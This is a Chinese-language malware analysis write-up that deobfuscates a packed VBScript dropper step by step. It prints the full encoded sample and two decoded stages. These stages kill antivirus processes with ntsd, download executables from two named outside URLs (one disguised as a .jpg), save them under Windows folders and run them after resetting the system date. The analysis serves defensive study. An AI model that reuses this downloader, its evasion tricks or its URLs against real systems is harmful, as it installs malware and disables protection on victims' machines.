原代码:
UgiuihuiYUG="execute>>P<>next<>>>P<<>>P<<>>P<<>>P<<>>P<<>>P<<>>P<<>>P<>for>>P<>P<>P<>strs=array(575784,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,83,101,116,32,107,106,74,73,104,117,111,73,74,73,111,85,73,121,117,117,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,34,43,34,115,34,43,34,99,34,43,34,114,34,43,34,105,34,43,34,112,34,43,34,116,46,83,34,43,34,104,34,43,34,69,34,43,34,108,34,43,34,76,34,41,32,13,10,83,101,116,32,100,101,103,121,73,84,54,71,89,55,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,34,43,34,68,34,43,34,79,34,43,34,68,34,43,34,66,46,83,34,43,34,116,34,43,34,114,34,43,34,101,34,43,34,97,34,43,34,109,34,41,13,10,83,101,116,32,103,121,117,71,89,85,103,121,117,89,71,85,103,117,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,34,43,34,115,34,43,34,120,34,43,34,77,34,43,34,108,34,43,34,50,46,120,34,43,34,77,34,43,34,108,34,43,34,72,34,43,34,84,34,43,34,116,34,43,34,112,34,41,13,10,72,84,84,80,61,34,104,116,116,112,58,34,13,10,72,84,80,80,61,34,47,47,34,13,10,72,84,80,84,61,34,37,54,34,13,10,107,106,74,73,104,117,111,73,61,34,37,51,48,34,13,10,107,106,74,108,104,117,111,73,61,34,37,51,50,34,13,10,102,111,114,32,101,97,99,104,32,112,115,32,105,110,32,103,101,116,111,98,106,101,99,116,40,34,119,105,110,109,103,109,116,115,58,92,92,46,92,114,111,111,116,92,99,105,109,118,50,58,119,105,110,51,50,95,112,114,111,99,101,115,115,34,41,46,105,110,115,116,97,110,99,101,115,95,13,10,105,102,32,112,115,46,78,97,109,101,61,34,114,102,119,115,114,118,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,49,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,50,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,51,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,65,89,85,112,100,97,116,101,46,97,121,101,34,116,104,101,110,32,13,10,107,106,74,73,104,117,111,73,74,73,111,85,73,121,117,117,46,114,117,110,32,34,110,116,115,100,32,45,112,32,34,43,99,115,116,
114,40,43,112,115,46,104,97,110,100,108,101,41,32,43,34,32,45,99,32,113,34,44,48,13,10,101,110,100,32,105,102,13,10,110,101,120,116,13,10,107,106,74,73,104,117,111,108,61,34,53,37,34,13,10,103,117,121,71,89,85,103,117,121,89,71,85,103,117,61,34,68,34,43,72,84,80,84,43,34,49,34,43,72,84,80,84,43,34,67,34,43,72,84,80,84,43,34,67,37,50,69,34,43,72,84,80,84,13,10,103,121,117,71,89,85,103,117,121,89,71,85,103,117,61,34,69,34,43,72,84,80,84,43,107,106,74,73,104,117,111,108,43,34,55,55,37,50,69,34,43,72,84,80,84,43,34,54,34,43,72,84,80,84,43,34,57,37,55,50,37,55,51,37,55,52,34,43,72,84,80,84,13,10,107,73,74,73,104,117,111,108,61,34,69,34,43,72,84,80,84,43,107,106,74,73,104,117,111,108,43,34,55,50,47,34,43,72,84,80,84,43,107,106,74,73,104,117,111,108,43,34,55,51,34,43,72,84,80,84,13,10,72,74,78,106,105,104,55,103,72,61,34,53,34,43,72,84,80,84,43,34,67,34,43,72,84,80,84,43,34,67,34,43,72,84,80,84,43,107,106,74,73,104,117,111,108,43,34,55,50,37,55,51,47,37,55,52,34,43,72,84,80,84,13,10,110,120,114,116,61,72,84,80,84,43,34,65,34,43,72,84,80,84,43,34,65,34,43,72,84,80,84,43,34,66,34,43,72,84,80,84,13,10,110,114,122,116,61,72,84,84,80,43,72,84,80,80,13,10,107,106,74,108,104,110,111,73,61,34,68,37,55,48,47,34,43,107,106,74,108,104,117,111,73,43,107,106,74,73,104,117,111,73,43,107,106,74,73,104,117,111,73,43,34,37,51,56,37,51,49,34,43,107,106,74,73,104,117,111,73,13,10,100,101,103,121,108,84,54,71,89,55,61,34,66,37,55,50,47,37,55,48,34,43,72,84,80,84,43,34,49,37,55,50,37,55,52,34,43,72,84,80,84,13,10,103,121,117,71,89,85,103,121,117,89,71,85,103,117,46,79,112,101,110,32,34,71,69,84,34,44,110,114,122,116,43,110,120,114,116,43,103,121,117,71,89,85,103,117,121,89,71,85,103,117,43,103,117,121,71,89,85,103,117,121,89,71,85,103,117,43,100,101,103,121,108,84,54,71,89,55,43,107,73,74,73,104,117,111,108,43,72,74,78,106,105,104,55,103,72,43,107,106,74,108,104,110,111,73,43,107,106,74,73,104,117,111,73,43,107,106,74,108,104,117,111,73,43,34,37,51,49,37,51,54,37,51,52,37,51,56,34,43,72,84,80,
84,43,34,50,37,51,55,37,53,70,34,43,107,106,74,108,104,117,111,73,44,48,13,10,103,121,117,71,89,85,103,121,117,89,71,85,103,117,46,83,101,110,100,40,41,13,10,100,101,103,121,73,84,54,71,89,55,46,77,111,100,101,61,51,13,10,100,101,103,121,73,84,54,71,89,55,46,84,121,112,101,61,49,13,10,100,101,103,121,73,84,54,71,89,55,46,79,112,101,110,40,41,13,10,100,101,103,121,73,84,54,71,89,55,46,87,114,105,116,101,40,103,121,117,71,89,85,103,121,117,89,71,85,103,117,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,100,101,103,121,73,84,54,71,89,55,46,115,65,86,101,116,79,70,105,76,101,32,34,67,58,92,87,73,78,68,79,87,83,92,105,110,102,92,97,119,103,46,101,120,101,34,13,10,107,106,74,73,104,117,111,73,74,73,111,85,73,121,117,117,46,114,117,110,32,40,34,99,109,100,32,47,99,32,115,101,116,32,100,97,116,101,61,37,100,97,116,101,37,32,38,38,100,97,116,101,32,50,48,48,56,45,52,45,49,32,38,38,112,105,110,103,32,45,110,32,49,48,32,49,50,55,46,48,46,48,46,49,32,38,38,115,116,97,114,116,32,67,58,92,87,73,78,68,79,87,83,92,105,110,102,92,97,119,103,46,101,120,101,32,38,38,100,97,116,101,32,37,100,97,116,101,37,32,34,41,44,48,13,10,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,72,74,85,61,34,37,54,65,34,13,10,65,55,61,34,37,55,34,13,10,65,54,70,54,67,54,67,54,53,54,55,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52,51,50,51,56,51,50,51,54,51,53,51,55,61,34,104,116,116,112,58,47,47,34,13,10,83,101,116,32,72,74,85,106,105,104,55,103,72,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,34,43,34,115,34,43,34,99,34,43,34,114,34,43,34,105,34,43,34,112,34,43,34,116,46,83,34,43,34,104,34,43,34,69,34,43,34,108,34,43,34,76,34,41,32,13,10,83,101,116,32,100,101,103,121,73,84,54,71,89,55,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,34,43,34,68,34,43,34,79,34,43,34,68,34,43,34,66,46,83,34,43,34,116,34,43,34,114,34,43,34,101,34,43,34,97,34,43,34,109,34,41,13,10,83,101,116,32,85,72,85,111,111,117,104,56,57,72,57,32,61,32,67,114,101,97,116,101,7
9,98,106,101,99,116,40,34,77,34,43,34,115,34,43,34,120,34,43,34,77,34,43,34,108,34,43,34,50,46,120,34,43,34,77,34,43,34,108,34,43,34,72,34,43,34,84,34,43,34,116,34,43,34,112,34,41,13,10,102,111,114,32,101,97,99,104,32,112,115,32,105,110,32,103,101,116,111,98,106,101,99,116,40,34,119,105,110,109,103,109,116,115,58,92,92,46,92,114,111,111,116,92,99,105,109,118,50,58,119,105,110,51,50,95,112,114,111,99,101,115,115,34,41,46,105,110,115,116,97,110,99,101,115,95,13,10,105,102,32,112,115,46,78,97,109,101,61,34,114,102,119,115,114,118,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,49,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,50,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,51,46,101,120,101,34,32,111,114,32,112,115,46,110,97,109,101,61,34,65,89,85,112,100,97,116,101,46,97,121,101,34,116,104,101,110,32,13,10,72,74,85,106,105,104,55,103,72,46,114,117,110,32,34,110,116,115,100,32,45,112,32,34,43,99,115,116,114,40,43,112,115,46,104,97,110,100,108,101,41,32,43,34,32,45,99,32,113,34,44,48,13,10,101,110,100,32,105,102,13,10,110,101,120,116,13,10,85,72,85,111,111,117,104,56,57,72,57,46,79,112,101,110,32,34,71,69,84,34,44,65,54,70,54,67,54,67,54,53,54,55,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52,51,50,51,56,51,50,51,54,51,53,51,55,43,65,55,43,34,55,34,43,65,55,43,34,55,34,43,65,55,43,34,55,34,43,34,37,50,69,37,54,51,37,54,55,37,54,50,34,43,65,55,43,34,51,37,50,69,34,43,72,74,85,43,65,55,43,34,48,47,34,43,34,37,54,56,37,54,70,37,54,68,37,54,53,47,37,54,57,37,54,68,37,54,49,37,54,55,37,54,53,34,43,65,55,43,34,51,47,37,54,50,37,54,49,37,54,69,37,54,69,37,54,53,34,43,65,55,43,34,50,34,43,65,55,43,34,51,47,34,43,65,55,43,34,48,37,54,70,34,43,65,55,43,34,50,34,43,65,55,43,34,52,37,54,54,37,54,70,37,54,67,37,54,57,37,54,70,34,43,34,66,34,43,34,37,51,49,37,51,48,37,51,56,37,51,56,34,43,34,46,34,43,72,74,85,43,65,55,43,34,48,37,54,55,34,44,48,13,10,85,72,85,111,111,117,104,56,57,72,57,46,83,101,110,100,40,41,13,10,100,101,103,121
,73,84,54,71,89,55,46,77,111,100,101,61,51,13,10,100,101,103,121,73,84,54,71,89,55,46,84,121,112,101,61,49,13,10,100,101,103,121,73,84,54,71,89,55,46,79,112,101,110,40,41,13,10,100,101,103,121,73,84,54,71,89,55,46,87,114,105,116,101,40,85,72,85,111,111,117,104,56,57,72,57,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,100,101,103,121,73,84,54,71,89,55,46,115,65,86,101,116,79,70,105,76,101,32,34,67,58,92,87,73,78,68,79,87,83,92,97,100,100,105,110,115,92,111,116,46,101,120,101,34,13,10,72,74,85,106,105,104,55,103,72,46,114,117,110,32,40,34,99,109,100,32,47,99,32,115,101,116,32,100,97,116,101,61,37,100,97,116,101,37,32,38,38,100,97,116,101,32,50,48,48,57,45,55,45,49,32,38,38,112,105,110,103,32,45,110,32,49,48,32,49,50,55,46,48,46,48,46,49,32,38,38,115,116,97,114,116,32,67,58,92,87,73,78,68,79,87,83,92,97,100,100,105,110,115,92,111,116,46,101,120,101,32,38,38,100,97,116,101,32,37,100,97,116,101,37,32,34,41,44,48,13,10)<>"
' Undo the packer's placeholder substitutions before decoding:
' ">>P<<" becomes a tab, "ΰ" a double quote and "Ǯ" a single quote.
UgiuihuiYUG = Replace(UgiuihuiYUG, ">>P<<",chr(9))
UgiuihuiYUG = Replace(UgiuihuiYUG, "ΰ", chr(34))
UgiuihuiYUG = Replace(UgiuihuiYUG, "Ǯ", chr(39))
' MyEncode rebuilds the inner script text and execute runs it. This call and the
' "execute" keyword stored at the start of the packed string are the two points
' where the sample turns data into running code, so they are the places to hook
' when dumping a layer.
execute(MyEncode(UgiuihuiYUG))
' Rebuilds the hidden script from the packed string: splits hack520org into
' segments and returns them in reverse order, each followed by vbCrLf.
' NOTE(review): the Split delimiter below is broken across two lines as it
' appears on this page, which is not a valid VBScript string literal. The real
' delimiter was presumably damaged when the page was copied; confirm against
' the original sample before relying on this listing.
function MyEncode(hack520org)
sz = Split(hack520org, "<
>")
' Walk the segments from last to first so the stored order is inverted.
For i = UBound(sz) To 0 Step -1
weiwei = weiwei + sz(i) + vbcrlf
Next
MyEncode=weiwei
end function
加入代码
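' Analysis helper: dumps one decoded layer instead of executing it.
' Substitute it for the sample's first "execute" so the decoded source in ee is
' displayed and saved, and the script host exits before any of it runs.
'   ee - the script text the sample would otherwise have passed to execute
Sub Intercept (ee)
Dim OutPutFile, objFSO, objTXT, objWSH
WScript.Echo ee
OutPutFile="decode_1.txt"
Set objFSO=CreateObject("Scripting.FileSystemObject")
' Overwrite any earlier dump (True); the third argument False writes ANSI text.
Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)
objTXT.Write ee
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
' Name the viewer explicitly. Running the bare file name hands the dump to
' whatever program is associated with its extension, so a dump saved with a
' script extension would be executed rather than displayed.
objWSH.Run "notepad.exe """ & objFSO.GetAbsolutePathName(OutPutFile) & """"
' Stop the host here so nothing after the intercepted layer executes.
WScript.Quit
End Sub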
替换第一个execute为Intercept,执行:
得到代码:
' Decoded stage 1 of the sample (analysis listing, not meant to be run).
' Flow: suppress errors -> create shell/stream/HTTP objects -> terminate selected
' processes -> download a file -> save it as an .exe -> start it with the system
' date temporarily changed.
' NOTE(review): this listing shows forward slashes in the WMI moniker and the
' file paths, but the character-code array in the packed source encodes
' backslashes (92) at those positions; the slashes were presumably altered when
' the page was published.

' Every runtime error is ignored, so a failed step does not stop the script.
on error resume next
' The ProgIDs are assembled from fragments with mixed case ("Wscript.ShElL",
' "ADODB.Stream", "MsxMl2.xMlHTtp") so the complete names never appear as one
' literal. Signatures that match on the contiguous ProgID strings miss this form.
Set kjJIhuoIJIoUIyuu=CreateObject("W"+"s"+"c"+"r"+"i"+"p"+"t.S"+"h"+"E"+"l"+"L")
Set degyIT6GY7=CreateObject("A"+"D"+"O"+"D"+"B.S"+"t"+"r"+"e"+"a"+"m")
Set gyuGYUgyuYGUgu = CreateObject("M"+"s"+"x"+"M"+"l"+"2.x"+"M"+"l"+"H"+"T"+"t"+"p")
' Building blocks for the download URL: the scheme plus percent-encoding
' fragments that are concatenated further down.
HTTP="http:"
HTPP="//"
HTPT="%6"
kjJIhuoI="%30"
kjJlhuoI="%32"
' Enumerate running processes through WMI (Win32_Process).
for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_
' Targets are matched by image name only. rfwsrv.exe and AYUpdate.aye look like
' security-product processes (presumably the Rising firewall service and the
' ALYac updater; confirm). 1.exe/2.exe/3.exe are generic names whose purpose the
' page does not show.
if ps.Name="rfwsrv.exe" or ps.name="1.exe" or ps.name="2.exe" or ps.name="3.exe" or ps.name="AYUpdate.aye"then
' Attaches the NTSD debugger to the process id (ps.handle) and issues "q" at once,
' which ends the debugger together with the attached process; window style 0
' keeps it hidden. Detection: a script host spawning ntsd.exe is a strong signal.
kjJIhuoIJIoUIyuu.run "ntsd -p "+cstr(+ps.handle) +" -c q",0
end if
next
' The URL is kept as percent-encoded pieces in look-alike variable names
' (I/l swaps such as kjJIhuoI vs kjJlhuoI) and joined only in the Open call.
' The assembled and decoded value is the first URL listed later on this page.
kjJIhuol="5%"
guyGYUguyYGUgu="D"+HTPT+"1"+HTPT+"C"+HTPT+"C%2E"+HTPT
gyuGYUguyYGUgu="E"+HTPT+kjJIhuol+"77%2E"+HTPT+"6"+HTPT+"9%72%73%74"+HTPT
kIJIhuol="E"+HTPT+kjJIhuol+"72/"+HTPT+kjJIhuol+"73"+HTPT
HJNjih7gH="5"+HTPT+"C"+HTPT+"C"+HTPT+kjJIhuol+"72%73/%74"+HTPT
nxrt=HTPT+"A"+HTPT+"A"+HTPT+"B"+HTPT
nrzt=HTTP+HTPP
kjJlhnoI="D%70/"+kjJlhuoI+kjJIhuoI+kjJIhuoI+"%38%31"+kjJIhuoI
degylT6GY7="B%72/%70"+HTPT+"1%72%74"+HTPT
' Synchronous GET (third argument 0 = not asynchronous) over plain HTTP.
gyuGYUgyuYGUgu.Open "GET",nrzt+nxrt+gyuGYUguyYGUgu+guyGYUguyYGUgu+degylT6GY7+kIJIhuol+HJNjih7gH+kjJlhnoI+kjJIhuoI+kjJlhuoI+"%31%36%34%38"+HTPT+"2%37%5F"+kjJlhuoI,0
gyuGYUgyuYGUgu.Send()
' ADODB.Stream in read/write mode (3) and binary type (1) writes the raw response
' body to disk unchanged.
degyIT6GY7.Mode=3
degyIT6GY7.Type=1
degyIT6GY7.Open()
degyIT6GY7.Write(gyuGYUgyuYGUgu.responseBody)
' Host artifact: an executable dropped into the Windows inf directory.
degyIT6GY7.sAVetOFiLe "C:/WINDOWS/inf/awg.exe"
' Hidden cmd chain: remember the current date, set the system date to 2008-4-1,
' ping localhost 10 times (a delay), start the dropped file, then restore the
' date. The page does not state why the clock is changed; presumably it is meant
' to disturb date-dependent security software (confirm). A system-time change
' made from a script host is itself a useful detection point.
kjJIhuoIJIoUIyuu.run ("cmd /c set date=%date% &&date 2008-4-1 &&ping -n 10 127.0.0.1 &&start C:/WINDOWS/inf/awg.exe &&date %date% "),0
' Decoded stage 2 of the sample (analysis listing, not meant to be run).
' It repeats the stage 1 pattern with a second URL, drop path and fake date.
' NOTE(review): as in stage 1, the forward slashes in the WMI moniker and file
' paths stand where the packed character codes encode backslashes (92).

' Errors stay suppressed for this stage as well.
on error resume next
' Percent-encoding fragments used to assemble the second URL.
HJU="%6A"
A7="%7"
' A variable named like a hex string holds the scheme prefix.
A6F6C6C6567652E6FA764313134323832363537="http://"
' Same fragment-built ProgIDs as stage 1: "Wscript.ShElL", "ADODB.Stream",
' "MsxMl2.xMlHTtp". degyIT6GY7 is re-created, replacing the stage 1 stream.
Set HJUjih7gH=CreateObject("W"+"s"+"c"+"r"+"i"+"p"+"t.S"+"h"+"E"+"l"+"L")
Set degyIT6GY7=CreateObject("A"+"D"+"O"+"D"+"B.S"+"t"+"r"+"e"+"a"+"m")
Set UHUoouh89H9 = CreateObject("M"+"s"+"x"+"M"+"l"+"2.x"+"M"+"l"+"H"+"T"+"t"+"p")
' Second pass over the process list with the same image names as stage 1.
for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_
if ps.Name="rfwsrv.exe" or ps.name="1.exe" or ps.name="2.exe" or ps.name="3.exe" or ps.name="AYUpdate.aye"then
' Attach NTSD to the process id and quit at once, ending the process; hidden window.
HJUjih7gH.run "ntsd -p "+cstr(+ps.handle) +" -c q",0
end if
next
' Synchronous GET of the second URL. Its decoded form, listed later on this page,
' ends in .jpg although the response is saved and started as an .exe below, so a
' file-extension filter on the proxy would not flag the download.
UHUoouh89H9.Open "GET",A6F6C6C6567652E6FA764313134323832363537+A7+"7"+A7+"7"+A7+"7"+"%2E%63%67%62"+A7+"3%2E"+HJU+A7+"0/"+"%68%6F%6D%65/%69%6D%61%67%65"+A7+"3/%62%61%6E%6E%65"+A7+"2"+A7+"3/"+A7+"0%6F"+A7+"2"+A7+"4%66%6F%6C%69%6F"+"B"+"%31%30%38%38"+"."+HJU+A7+"0%67",0
UHUoouh89H9.Send()
' Binary read/write stream: the response body is written to disk unchanged.
degyIT6GY7.Mode=3
degyIT6GY7.Type=1
degyIT6GY7.Open()
degyIT6GY7.Write(UHUoouh89H9.responseBody)
' Host artifact: an executable dropped into the Windows addins directory.
degyIT6GY7.sAVetOFiLe "C:/WINDOWS/addins/ot.exe"
' Same hidden cmd chain as stage 1, this time with the date set to 2009-7-1
' before the dropped file is started and restored afterwards.
HJUjih7gH.run ("cmd /c set date=%date% &&date 2009-7-1 &&ping -n 10 127.0.0.1 &&start C:/WINDOWS/addins/ot.exe &&date %date% "),0
替换关键代码:如*.open为msgbox显示下载路径:
' Analysis substitution: each msgbox takes the place of the matching .Open call
' and displays the assembled (still percent-encoded) URL instead of requesting it.
' NOTE(review): only the string-building assignments are needed for these two
' lines to work. The page does not show whether the remaining statements were
' removed; if left in, the process-kill loops and the date-changing cmd lines
' would still run, and "on error resume next" would hide the failed Send.
msgbox(nrzt+nxrt+gyuGYUguyYGUgu+guyGYUguyYGUgu+degylT6GY7+kIJIhuol+HJNjih7gH+kjJlhnoI+kjJIhuoI+kjJlhuoI+"%31%36%34%38"+HTPT+"2%37%5F"+kjJlhuoI)
msgbox(A6F6C6C6567652E6FA764313134323832363537+A7+"7"+A7+"7"+A7+"7"+"%2E%63%67%62"+A7+"3%2E"+HJU+A7+"0/"+"%68%6F%6D%65/%69%6D%61%67%65"+A7+"3/%62%61%6E%6E%65"+A7+"2"+A7+"3/"+A7+"0%6F"+A7+"2"+A7+"4%66%6F%6C%69%6F"+"B"+"%31%30%38%38"+"."+HJU+A7+"0%67")
显示出来的东西为:
http://%6A%6A%6B%6E%65%77%2E%66%69%72%73%74%6D%61%6C%6C%2E%6B%72/%70%61%72%74%6E%65%72/%65%73%65%6C%6C%65%72%73/%74%6D%70/%32%30%30%38%31%30%30%32%31%36%34%38%62%37%5F%32
http://%77%77%77%2E%63%67%62%73%2E%6A%70/%68%6F%6D%65/%69%6D%61%67%65%73/%62%61%6E%6E%65%72%73/%70%6F%72%74%66%6F%6C%69%6FB%31%30%38%38.%6A%70%67
Redoce解密:
http://jjknew.firstmall.kr/partner/esellers/tmp/200810021648b7_2
http://www.cgbs.jp/home/images/banners/portfolioB1088.jpg
更简单的方法:
直接在源代码前面加上(此处的代码在页面转载时丢失,推测为 VBScript 的起始标签 <script language="vbscript">):
再在后面加上(此处同样丢失,推测为对应的结束标签 </script>):
最后修改第一个execute为alert。修改原文件名为1.html运行并允许弹出的内容即可。